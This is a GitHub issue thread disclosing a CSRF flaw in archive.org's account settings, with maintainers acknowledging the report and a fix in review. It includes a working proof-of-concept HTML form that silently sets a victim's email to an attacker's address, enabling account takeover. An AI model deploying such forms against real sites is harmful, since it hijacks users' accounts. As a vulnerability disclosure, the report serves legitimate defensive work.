### ISSUE TITLE
InternetArchive/OpenLibrary User Account Takeover

### ISSUE THREAD

**Issue by the-nine-tail** [internetarchive/openlibrary#3210]
Domain: https://archive.org
Vulnerability: CSRF
Severe: Medium-High
Risk: Complete User Account Takeover

Steps to reproduce:
A. Create a form ------>

```
<form action="https://archive.org/account/index.php?settings=1" name="change-email" method="POST">
      <div class="formElement ">
        <input autofocus="autofocus" type="hidden" class="form-control " id="email" name="email" value="attackeremail@here.com">
      </div>
      <div class="formElement">
        <input name="action" type="hidden" value="change-email">
        <input class="btn btn-primary" name="submit" type="submit" id="submit" value="Update">
      </div>
    </form>
```
B. As soon as user click on update their email id is changed.
C. Now attacker has the whole control he can reset password or change screen name and more.

The form can be customised as per need to make victim click.

- **Logged in (Y/N)?** Y
- **Browser type/version?** Firefox
- **Operating system?** Ubuntu 18.04

### Proposal & Constraints
Solution: A valid CSRF token should be used or the source origin should be verified.

**Comment by mc2** [comment]
Thanks! Fix in code review.

**Comment by mekarpeles** [comment]
**Thank you** @the-nine-tail :)

**Comment by the-nine-tail** [comment]
@mekarpeles sir can I get your personal email address because I have some doubt to clear.
